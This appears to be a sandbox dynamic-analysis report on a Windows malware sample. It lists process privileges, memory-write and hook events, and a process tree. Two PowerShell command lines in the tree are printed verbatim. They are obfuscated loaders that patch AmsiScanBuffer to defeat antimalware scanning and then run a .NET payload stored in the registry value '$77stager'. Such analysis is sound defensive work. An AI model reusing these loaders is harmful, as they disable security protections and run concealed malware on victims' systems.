description pid Process Token: SeDebugPrivilege 1236 powershell.EXE Token: SeDebugPrivilege 1236 powershell.EXE Token: SeDebugPrivilege 908 dllhost.exe Token: SeDebugPrivilege 4724 $77XD.exe Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeDebugPrivilege 5068 webhostdll.exe Token: SeDebugPrivilege 5104 svchost.exe Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeDebugPrivilege 4332 main.exe Token: SeDebugPrivilege 3288 JOKER.exe Token: SeDebugPrivilege 2528 jusched.exe Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeShutdownPrivilege 3144 Explorer.EXE Token: SeCreatePagefilePrivilege 3144 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 1756 svchost.exe Token: SeIncreaseQuotaPrivilege 1756 svchost.exe Token: SeSecurityPrivilege 1756 svchost.exe Token: SeTakeOwnershipPrivilege 1756 svchost.exe Token: SeLoadDriverPrivilege 1756 svchost.exe -
Suspicious use of FindShellTrayWindow 51 IoCs
pid Process 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 2256 Conhost.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 4100 Install.exe 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3144 Explorer.EXE 3624 Install.exe 3144 Explorer.EXE 3144 Explorer.EXE 2528 jusched.exe 4188 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3120 wrote to memory of 212 3120 msedge.exe 84 PID 3120 wrote to memory of 212 3120 msedge.exe 84 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2204 3120 msedge.exe 85 PID 3120 wrote to memory of 2952 3120 msedge.exe 86 PID 3120 wrote to memory of 2952 3120 msedge.exe 86 PID 3120 wrote to memory of 208 3120 msedge.exe 87 PID 3120 wrote to memory of 208 3120 msedge.exe 87 PID 3120 wrote to memory of 208 3120 msedge.exe 87 PID 3120 wrote to memory of 208 3120 msedge.exe 87 PID 3120 wrote to memory of 208 3120 msedge.exe 87 PID 3120 wrote to memory of 208 3120 msedge.exe 87 PID 3120 wrote to memory of 208 3120 msedge.exe 87 PID 3120 wrote to memory of 208 3120 msedge.exe 87 PID 3120 wrote to memory of 208 3120 msedge.exe 87 PID 3120 wrote to memory of 208 3120 msedge.exe 87 PID 3120 wrote to memory of 208 3120 msedge.exe 87 PID 3120 wrote to memory of 208 3120 msedge.exe 87 PID 3120 wrote to memory of 208 3120 msedge.exe 87 PID 3120 wrote to memory of 208 3120 msedge.exe 87 PID 3120 wrote to memory of 208 3120 msedge.exe 87 PID 3120 wrote to memory of 208 3120 msedge.exe 87 PID 3120 wrote to memory of 208 3120 msedge.exe 87 PID 3120 wrote to memory of 208 3120 msedge.exe 87 PID 3120 wrote to memory of 208 3120 msedge.exe 87 PID 3120 wrote to memory of 208 3120 msedge.exe 87 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 4100 attrib.exe 724 attrib.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:384
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{70da4fb0-9883-4f68-b5dd-684386d862e8}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{74909919-d324-4e5b-856f-80c58d608c6a}2⤵PID:4496
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:428
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:920
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1088
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1180 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lGXdBDrmXIKd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$gUWpeSUnNIxIto,[Parameter(Position=1)][Type]$FysciAdPHF)$XkCuLefPWMe=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+'ct'+'e'+''+'d'+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+'M'+''+'e'+'mor'+'y'+''+[Char](77)+'od'+[Char](117)+'le',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+'e'+[Char](84)+'y'+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'Pu'+[Char](98)+''+'l'+''+'i'+'c'+','+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,'+[Char](65)+'ns'+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+'A'+'ut'+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$XkCuLefPWMe.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+'e,'+'H'+'i'+[Char](100)+''+'e'+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$gUWpeSUnNIxIto).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+'i'+'m'+''+'e'+','+'M'+''+'a'+''+[Char](110)+'a'+'g'+''+[Char](101)+''+[Char](100)+'');$XkCuLefPWMe.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+'k'+'e',''+'P'+'ub'+[Char](108)+'ic'+','+'Hi'+[Char](100)+''+[Char](101)+'ByS'+[Char](105)+''+'g'+','+'N'+'ew'+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$FysciAdPHF,$gUWpeSUnNIxIto).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+'d'+'');Write-Output $XkCuLefPWMe.CreateType();}$rMdEnZCvyoBDo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+'r'+''+[Char](111)+'so'+[Char](102)+''+'t'+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+'N'+'a'+''+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+[Char](100)+'s');$IvEGERrkLiULac=$rMdEnZCvyoBDo.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+''+'c'+''+[Char](44)+''+'S'+''+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$UiRTDErXBeiYlgQCSnk=lGXdBDrmXIKd @([String])([IntPtr]);$mfNRboFpFYIUXjPGWhrWyT=lGXdBDrmXIKd @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ktKHjeQflwq=$rMdEnZCvyoBDo.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'Han'+[Char](100)+'le').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+'n'+'e'+'l'+'3'+''+[Char](50)+'.'+'d'+'l'+[Char](108)+'')));$wOikXNyjXDhnci=$IvEGERrkLiULac.Invoke($Null,@([Object]$ktKHjeQflwq,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$UswhRpNCxwEuCyQDX=$IvEGERrkLiULac.Invoke($Null,@([Object]$ktKHjeQflwq,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+''+[Char](80)+''+'r'+''+[Char](111)+''+'t'+'ect')));$oCcvuBf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wOikXNyjXDhnci,$UiRTDErXBeiYlgQCSnk).Invoke(''+'a'+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+'ll');$QuCyJWGqcTkpfrunX=$IvEGERrkLiULac.Invoke($Null,@([Object]$oCcvuBf,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+'c'+'a'+''+[Char](110)+''+'B'+''+'u'+'f'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$PaEQQfLDLu=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UswhRpNCxwEuCyQDX,$mfNRboFpFYIUXjPGWhrWyT).Invoke($QuCyJWGqcTkpfrunX,[uint32]8,4,[ref]$PaEQQfLDLu);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QuCyJWGqcTkpfrunX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UswhRpNCxwEuCyQDX,$mfNRboFpFYIUXjPGWhrWyT).Invoke($QuCyJWGqcTkpfrunX,[uint32]8,0x20,[ref]$PaEQQfLDLu);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'FT'+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+'77'+'s'+''+[Char](116)+''+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:mjudJGKXClZR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$pQRLpAFPsmbzOr,[Parameter(Position=1)][Type]$lWrrWImNzU)$iQqfnAJPUYA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+'u'+''+[Char](108)+'e',$False).DefineType('M'+'y'+'D'+'e'+''+[Char](108)+''+[Char](101)+'ga'+'t'+''+'e'+''+'T'+'yp'+[Char](101)+'','Cl'+[Char](97)+''+'s'+''+[Char](115)+''+','+'P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+'e'+[Char](97)+'l'+'e'+''+[Char](100)+''+','+'A'+[Char](110)+''+'s'+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+'t'+'o'+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$iQqfnAJPUYA.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'ci'+[Char](97)+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+'Hid'+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$pQRLpAFPsmbzOr).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+'i'+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+''+[Char](100)+'');$iQqfnAJPUYA.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+'i'+'c'+','+'H'+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+'y'+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+','+''+[Char](86)+''+[Char](105)+'r'+'t'+'u'+[Char](97)+''+[Char](108)+'',$lWrrWImNzU,$pQRLpAFPsmbzOr).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+'im'+'e'+','+'M'+''+[Char](97)+''+'n'+'ag'+[Char](101)+''+[Char](100)+'');Write-Output $iQqfnAJPUYA.CreateType();}$DOHUafJLKCLEI=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'ic'+[Char](114)+''+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+'.'+'U'+'n'+'s'+''+'a'+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+'h'+''+[Char](111)+''+'d'+'s');$BHchXnannDHgBr=$DOHUafJLKCLEI.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$mNEtmpyKlxwWYRhOZPL=mjudJGKXClZR @([String])([IntPtr]);$gUTenfynorkBeasqbXdaPK=mjudJGKXClZR @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$PEBAcAVMdiN=$DOHUafJLKCLEI.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](77)+'od'+[Char](117)+''+[Char](108)+''+'e'+''+'H'+''+'a'+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+'n'+'e'+[Char](108)+''+[Char](51)+''+'2'+'.d'+[Char](108)+''+[Char](108)+'')));$PlBNuTROuuLmhd=$BHchXnannDHgBr.Invoke($Null,@([Object]$PEBAcAVMdiN,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+'Li'+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$hDSnGpYgmtxEruRia=$BHchXnannDHgBr.Invoke($Null,@([Object]$PEBAcAVMdiN,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+'l'+[Char](80)+''+'r'+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+[Char](116)+'')));$scZTBUO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PlBNuTROuuLmhd,$mNEtmpyKlxwWYRhOZPL).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+'dl'+[Char](108)+'');$KVcCVEiBLlsCOVznL=$BHchXnannDHgBr.Invoke($Null,@([Object]$scZTBUO,[Object](''+[Char](65)+''+'m'+''+'s'+'i'+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+'uf'+'f'+'e'+[Char](114)+'')));$QLsPSJHOmm=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hDSnGpYgmtxEruRia,$gUTenfynorkBeasqbXdaPK).Invoke($KVcCVEiBLlsCOVznL,[uint32]8,4,[ref]$QLsPSJHOmm);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$KVcCVEiBLlsCOVznL,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hDSnGpYgmtxEruRia,$gUTenfynorkBeasqbXdaPK).Invoke($KVcCVEiBLlsCOVznL,[uint32]8,0x20,[ref]$QLsPSJHOmm);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+'T'+''+'W'+'A'+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](55)+''+[Char](55)+'s'+[Char](116)+''+[Char](97)+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Command and Scripting Interpreter: PowerShell
PID:4488 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
PID:4188
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1200
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1260
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1308
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1440
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2536
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1492
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1500
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1652
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1704
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1804
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1824
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1932
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1976
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1992
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2168
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2212
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2840
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2940
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2984
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2996
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:3012
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:3032
-
